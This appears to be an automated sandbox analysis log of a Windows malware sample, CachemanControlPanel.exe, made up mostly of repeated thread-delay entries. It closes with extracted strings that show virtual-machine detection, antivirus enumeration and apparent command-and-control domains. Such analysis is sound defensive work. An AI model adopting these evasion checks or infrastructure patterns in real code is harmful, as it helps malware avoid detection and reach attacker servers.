    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 50804Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 50695Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 50585Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 50476Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 50367Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 50257Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 50148Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 50038Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 49929Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 49820Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 49710Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 49601Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 49492Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 49381Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 49273Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 49163Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 49054Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 48945Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 48836Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 48725Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 48616Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 48507Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 48398Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 48289Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 48179Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 48070Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 47960Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 47851Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 47741Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 47632Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 47523Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 47412Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 47168Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 47052Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 46942Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 46832Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 46723Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 46617Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 46505Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 46080Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 45974Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 45861Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 45758Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 45648Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 45538Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 45421Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 44825Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 44667Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 44554Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 44445Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 44336Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 44226Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 44116Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 44008Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 43898Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 43788Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 43680Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 43570Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 43460Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 43351Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 43242Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 43132Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 43023Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 42914Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 42804Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 42695Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 42585Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 42476Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 42366Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 42258Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 42148Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 42039Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 41929Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 41819Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 41711Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 41601Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 41492Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 41383Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 41273Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 41164Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 41054Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 40945Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 40836Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 40726Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 40617Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 40507Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 40398Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 40288Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 40179Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 40069Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 39961Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 39851Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 39741Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 39632Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 39523Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 39413Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 39304Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 39195Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 39085Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 38976Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 38867Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 38757Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 38648Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 38539Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 38428Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 38319Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 38210Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 38101Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 37992Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 37882Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 37773Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 37664Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 37555Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 37445Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 37335Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 37226Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 37116Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 37005Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 36898Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 36788Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 36680Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 36570Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 36460Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 36351Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 36242Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 36132Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 36023Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 35914Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 35803Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 35695Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 35586Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 35476Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 35365Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 35258Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 35148Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 35039Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 34929Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 34819Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 34711Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 34601Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 34491Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 34382Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 34273Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 34164Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 34054Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 33944Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 33835Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 33726Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 33617Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 33507Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 33395Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 33289Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 33179Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 33070Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 32961Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 32852Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 32742Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 32633Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 32523Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 32414Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 32304Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 32195Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 32086Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 31976Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 31865Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 31758Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 31648Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 31539Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 31430Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 31320Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 31211Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 31101Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 30992Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 30882Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 30770Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 30664Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 30554Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 30445Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 30336Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 30226Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 30117Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 30008Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 260000Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 259884Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 259778Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 259669Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 259560Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 259450Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 259341Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 259232Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 259122Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 259013Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 258899Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 258794Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 258685Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 258576Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 258466Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 258356Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 258246Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 258138Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 258029Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 257919Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 257810Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 257701Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 257591Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 257482Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 257372Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 257263Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 257153Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 257044Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 256935Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 256825Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 256716Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 256606Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 256497Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 256388Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 256277Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 256169Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 256060Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 255951Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 255841Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 255732Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 255622Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 255513Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 30000Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 255412Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 255297Jump to behavior
    Source: CachemanControlPanel.exeBinary or memory string: vmGuestLib
    Source: CachemanControlPanel.exe, 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmpBinary or memory string: ml--bdns.prowin32_PingStatus where address='DisplayName=AntiVirusProductcaptioninsmodules\vboxmrxnpLogicalDisk Where DriveType=4 get client -ftimersTEMP.dllosHOMEDRIVE\ref.confkey[L3Njb21tYSA=agent[id.conf
    Source: CachemanControlPanel.exeBinary or memory string: vboxmrxnp
    Source: CachemanControlPanel.exe, 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmpBinary or memory string: ?p=7?p=8tagpluginsvmGuestLib*|?lpc=connection_key?grf=?gpb=bdns.nu://reports?pcn=user_agent?gpp=7?gpp=8
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeAPI call chain: ExitProcess graph end nodegraph_1-3343
